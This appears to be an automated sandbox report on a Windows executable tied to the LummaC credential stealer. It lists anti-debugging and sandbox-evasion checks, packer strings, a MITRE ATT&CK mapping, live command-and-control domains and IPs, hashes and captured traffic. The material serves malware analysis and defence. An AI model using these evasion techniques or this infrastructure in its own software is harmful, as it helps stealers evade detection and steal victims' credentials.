Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C090EB second address: C09108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B569h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C09108 second address: C09113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C09113 second address: C0911F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F35AD45B556h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C185CA second address: C185D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C185D4 second address: C185DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F35AD45B556h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18058 second address: C1805E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18196 second address: C181B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD45B566h 0x00000009 js 00007F35AD45B556h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19FFC second address: C1A000 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1A000 second address: C1A01F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F35AD45B55Ch 0x0000000c jmp 00007F35AD45B55Bh 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1BAC1 second address: C1BAC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1BAC9 second address: C1BACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1FDB8 second address: C1FDD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 ja 00007F35AD0C7238h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F35AD0C723Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1FDD4 second address: C1FDD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2803B second address: C2803F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2803F second address: C28049 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F35AD45B556h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9DC7C3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9DA6AA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B986BD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: C0B7DF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe TID: 7792 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7788 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, file.exe, 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000003.00000003.1330974839.0000000001497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1330974839.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1336154740.0000000001497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1336154740.00000000014E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_009BDF70 LdrInitializeThunk, 3_2_009BDF70
Source: file.exe, file.exe, 00000003.00000002.1331884511.0000000000B68000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: WNProgram Manager
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix (the number in parentheses is the count of matching signatures for that technique; cells without a count are unmatched matrix placeholders)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (1) | DLL Side-Loading (1) | Process Injection (1) | Virtualization/Sandbox Evasion (24) | OS Credential Dumping | Security Software Discovery (631) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Command and Scripting Interpreter (2) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Process Injection (1) | LSASS Memory | Virtualization/Sandbox Evasion (24) | Remote Desktop Protocol | Data from Removable Media | Non-Application Layer Protocol (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (4) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Application Layer Protocol (13) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Software Packing (12) | NTDS | System Information Discovery (223) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://frogs-severz.sbs/W | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs/api(wWdtP | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs// | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs/api(wl | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs/apiC | 100% | Avira URL Cloud | malware |
https://frogs-severz.sbs/apiR | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
frogs-severz.sbs | 104.21.88.250 | true | false | | high
property-imper.sbs | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://frogs-severz.sbs/api | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://frogs-severz.sbs/W | file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.micro | file.exe, 00000003.00000003.1331160862.0000000001524000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1330974839.0000000001517000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://frogs-severz.sbs/ | file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://frogs-severz.sbs// | file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://frogs-severz.sbs/api(wWdtP | file.exe, 00000003.00000003.1330974839.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1336154740.00000000014C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://frogs-severz.sbs/apiC | file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://frogs-severz.sbs/api(wl | file.exe, 00000003.00000003.1330974839.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1336154740.00000000014C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://frogs-severz.sbs/apiR | file.exe, 00000003.00000003.1330974839.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1338310030.000000000152D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1331307685.000000000152D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.21.88.250 | frogs-severz.sbs | United States | | 13335 | CLOUDFLARENET US | false
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1562276
            Start date and time:2024-11-25 12:57:15 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 47s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:10
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:file.exe
            Detection:MAL
            Classification:mal100.evad.winEXE@1/0@2/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: file.exe
Time | Type | Description
06:58:16 | API Interceptor | 3x Sleep call for process: file.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.88.250 | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar |
104.21.88.250 | file.exe | malicious | LummaC Stealer |
104.21.88.250 | file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar |
104.21.88.250 | file.exe | malicious | LummaC Stealer |
104.21.88.250 | file.exe | malicious | Unknown |
104.21.88.250 | injector V2.5.exe | malicious | LummaC Stealer |
104.21.88.250 | SystemCoreHelper.dll | malicious | LummaC Stealer |
104.21.88.250 | b.exe | malicious | LummaC Stealer |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
frogs-severz.sbs | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 104.21.88.250
frogs-severz.sbs | file.exe | malicious | LummaC Stealer | 172.67.155.47
frogs-severz.sbs | file.exe | malicious | LummaC Stealer | 104.21.88.250
frogs-severz.sbs | file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 104.21.88.250
frogs-severz.sbs | file.exe | malicious | LummaC Stealer | 172.67.155.47
frogs-severz.sbs | file.exe | malicious | LummaC Stealer | 104.21.88.250
frogs-severz.sbs | file.exe | malicious | LummaC Stealer | 172.67.155.47
frogs-severz.sbs | file.exe | malicious | LummaC Stealer | 172.67.155.47
frogs-severz.sbs | file.exe | malicious | Unknown | 104.21.88.250
frogs-severz.sbs | Aquantia_Installer.exe | malicious | LummaC Stealer | 172.67.155.47
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msg | malicious | HTMLPhisher | 172.67.206.110
CLOUDFLARENETUS | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 104.21.88.250
CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.155.47
CLOUDFLARENETUS | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 172.67.145.234
CLOUDFLARENETUS | http://www.kalenderpedia.de | malicious | Unknown | 104.18.11.207
CLOUDFLARENETUS | https://protect-us.mimecast.com/s/N4SFCv2zvkHW7wOAuzlFYe | malicious | Unknown | 104.19.230.21
CLOUDFLARENETUS | denizbank 25.11.2024 E80 aspc.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.67.152
CLOUDFLARENETUS | http://propdfhub.com | malicious | Unknown | 104.18.30.234
CLOUDFLARENETUS | file.exe | malicious | Stealc, Vidar | 172.64.41.3
CLOUDFLARENETUS | http://taerendil.free.fr/Kzf20FukxrNV0r0Xw3 | malicious | Unknown | 104.16.40.28
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar | 104.21.88.250
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 104.21.88.250
a0e9f5d64349fb13191bc781f81f42e1 | IaslcsMo.ps1 | malicious | LummaC Stealer | 104.21.88.250
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 104.21.88.250
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 104.21.88.250
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 104.21.88.250
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 104.21.88.250
a0e9f5d64349fb13191bc781f81f42e1 | t90RvrDNvz.exe | malicious | Unknown | 104.21.88.250
a0e9f5d64349fb13191bc781f81f42e1 | docx008.docx.doc | malicious | Unknown | 104.21.88.250
a0e9f5d64349fb13191bc781f81f42e1 | docx002.docx.doc | malicious | Unknown | 104.21.88.250
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.946753259875961
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'846'784 bytes
                            MD5:1959840f03733001022c3aa78866b3e0
                            SHA1:a6a9800d7009ef076f66deecd050261271d6e3c0
                            SHA256:e38e917a486da4cd7fd65caf9761101feedc4a4d0feb047ad1b14e3423f3e903
                            SHA512:535ed9b7206e61c1b82df577ea48d8a00658349fcc4bd8d02bb4861d324904a333a22d5c4307caf931cb987d107ca1bd8bcb5b6e14553f45b1efbe5843bf0cbd
                            SSDEEP:49152:mWa/+R6/b/B+TuiQUOnCN1l200ihr1WTNfP:mh+A/rBEQ/C1rhr1WTBP
                            TLSH:A7853326AD272698CB314776529BC4EC7FE948AC119E7C8224FC436CF472ED8195B4EC
                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g.............................`I...........@...........................I.....(.....@.................................\...p..
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0x896000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            jmp 00007F35AC808BFAh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5805c | 0x70 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x57000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x581f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed, special characters) | 0x1000 | 0x56000 | 0x26200 | 419bc2c5cd2d6ea39762b453ab5daed9 | False | 0.9992123463114754 | data | 7.97874522345175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x57000 | 0x2b0 | 0x200 | f16b3702034c8f07c9e9079cfcc66f28 | False | 0.80078125 | data | 6.072057428570214 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x58000 | 0x1000 | 0x200 | c92ced077364b300efd06b14c70a61dc | False | 0.15625 | data | 1.1194718105633323 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed, special characters) | 0x59000 | 0x2a3000 | 0x200 | ece7234ed96622308e95295af5838931 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
izyzjrki | 0x2fc000 | 0x199000 | 0x199000 | 74e91a66ad5749560e6aeeced9147046 | False | 0.9938021708817237 | data | 7.952961646719837 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
beoowxtj | 0x495000 | 0x1000 | 0x400 | afb60bb5b6a551abd091b008d03ea48f | False | 0.7529296875 | data | 6.0175050685404985 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x496000 | 0x3000 | 0x2200 | be428c3fc1a535af2e75c1e36541afc9 | False | 0.060776654411764705 | DOS executable (COM) | 0.7702798642078158 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                            RT_MANIFEST | 0x494c44 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
                            DLL | Import
                            kernel32.dll | lstrcpy
                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                            2024-11-25T12:58:19.750219+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49706 | 104.21.88.250 | 443 | TCP
                            2024-11-25T12:58:20.536502+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.7 | 49706 | 104.21.88.250 | 443 | TCP
                            2024-11-25T12:58:20.536502+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.7 | 49706 | 104.21.88.250 | 443 | TCP
                            2024-11-25T12:58:21.491196+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49707 | 104.21.88.250 | 443 | TCP
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Nov 25, 2024 12:58:18.427442074 CET | 49706 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:18.427474022 CET | 443 | 49706 | 104.21.88.250 | 192.168.2.7
                            Nov 25, 2024 12:58:18.427531958 CET | 49706 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:18.434767962 CET | 49706 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:18.434786081 CET | 443 | 49706 | 104.21.88.250 | 192.168.2.7
                            Nov 25, 2024 12:58:19.750142097 CET | 443 | 49706 | 104.21.88.250 | 192.168.2.7
                            Nov 25, 2024 12:58:19.750219107 CET | 49706 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:19.754832983 CET | 49706 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:19.754839897 CET | 443 | 49706 | 104.21.88.250 | 192.168.2.7
                            Nov 25, 2024 12:58:19.755062103 CET | 443 | 49706 | 104.21.88.250 | 192.168.2.7
                            Nov 25, 2024 12:58:19.803530931 CET | 49706 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:19.811083078 CET | 49706 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:19.811129093 CET | 49706 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:19.811171055 CET | 443 | 49706 | 104.21.88.250 | 192.168.2.7
                            Nov 25, 2024 12:58:20.536303043 CET | 443 | 49706 | 104.21.88.250 | 192.168.2.7
                            Nov 25, 2024 12:58:20.536380053 CET | 443 | 49706 | 104.21.88.250 | 192.168.2.7
                            Nov 25, 2024 12:58:20.536571026 CET | 49706 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:20.538609028 CET | 49706 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:20.538609028 CET | 49706 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:20.538624048 CET | 443 | 49706 | 104.21.88.250 | 192.168.2.7
                            Nov 25, 2024 12:58:20.538634062 CET | 443 | 49706 | 104.21.88.250 | 192.168.2.7
                            Nov 25, 2024 12:58:20.593408108 CET | 49707 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:20.593451977 CET | 443 | 49707 | 104.21.88.250 | 192.168.2.7
                            Nov 25, 2024 12:58:20.593561888 CET | 49707 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:20.593925953 CET | 49707 | 443 | 192.168.2.7 | 104.21.88.250
                            Nov 25, 2024 12:58:20.593946934 CET | 443 | 49707 | 104.21.88.250 | 192.168.2.7
                            Nov 25, 2024 12:58:21.491195917 CET | 49707 | 443 | 192.168.2.7 | 104.21.88.250
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Nov 25, 2024 12:58:17.520112991 CET | 64517 | 53 | 192.168.2.7 | 1.1.1.1
                            Nov 25, 2024 12:58:17.831144094 CET | 53 | 64517 | 1.1.1.1 | 192.168.2.7
                            Nov 25, 2024 12:58:17.886907101 CET | 63074 | 53 | 192.168.2.7 | 1.1.1.1
                            Nov 25, 2024 12:58:18.416856050 CET | 53 | 63074 | 1.1.1.1 | 192.168.2.7
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Nov 25, 2024 12:58:17.520112991 CET | 192.168.2.7 | 1.1.1.1 | 0x57b8 | Standard query (0) | property-imper.sbs | A (IP address) | IN (0x0001) | false
                            Nov 25, 2024 12:58:17.886907101 CET | 192.168.2.7 | 1.1.1.1 | 0xa441 | Standard query (0) | frogs-severz.sbs | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Nov 25, 2024 12:58:17.831144094 CET | 1.1.1.1 | 192.168.2.7 | 0x57b8 | Name error (3) | property-imper.sbs | none | none | A (IP address) | IN (0x0001) | false
                            Nov 25, 2024 12:58:18.416856050 CET | 1.1.1.1 | 192.168.2.7 | 0xa441 | No error (0) | frogs-severz.sbs | | 104.21.88.250 | A (IP address) | IN (0x0001) | false
